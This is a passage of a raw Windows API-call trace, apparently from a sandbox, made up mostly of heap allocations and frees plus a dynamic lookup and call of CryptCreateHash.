RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.544] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.544] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0250.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0250.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0250.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0250.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e517d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.548] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0250.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0250.549] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0250.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0250.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0250.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0250.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0250.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0250.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0250.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 